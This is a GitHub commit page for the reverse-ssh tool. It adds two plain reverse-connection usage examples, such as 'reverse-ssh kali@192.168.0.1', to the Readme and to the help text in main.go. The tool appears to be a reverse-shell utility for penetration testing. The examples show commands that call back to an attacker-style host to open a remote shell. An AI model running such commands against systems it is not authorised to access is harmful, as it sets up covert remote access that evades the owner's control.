Skip to content

Commit

Permalink
Add simple examples for plain reverse scenario
Browse files Browse the repository at this point in the history
  • Loading branch information
Fahrj committed Jul 15, 2021
1 parent a7a5db1 commit 7c5866b
Show file tree
Hide file tree
Showing 2 changed files with 4 additions and 0 deletions.
2 changes: 2 additions & 0 deletions Readme.md
Original file line number Diff line number Diff line change
Expand Up @@ -60,6 +60,8 @@ Examples:
reverse-ssh
reverse-ssh -v -l :4444
Reverse:
reverse-ssh 192.168.0.1
reverse-ssh kali@192.168.0.1
reverse-ssh -p 31337 192.168.0.1
reverse-ssh -v -b 0 kali@192.168.0.2

Expand Down
2 changes: 2 additions & 0 deletions main.go
Original file line number Diff line number Diff line change
Expand Up @@ -51,6 +51,8 @@ Examples:
%[1]s
%[1]s -v -l :4444
Reverse:
%[1]s 192.168.0.1
%[1]s kali@192.168.0.1
%[1]s -p 31337 192.168.0.1
%[1]s -v -b 0 kali@192.168.0.2
Expand Down

0 comments on commit 7c5866b

Please sign in to comment.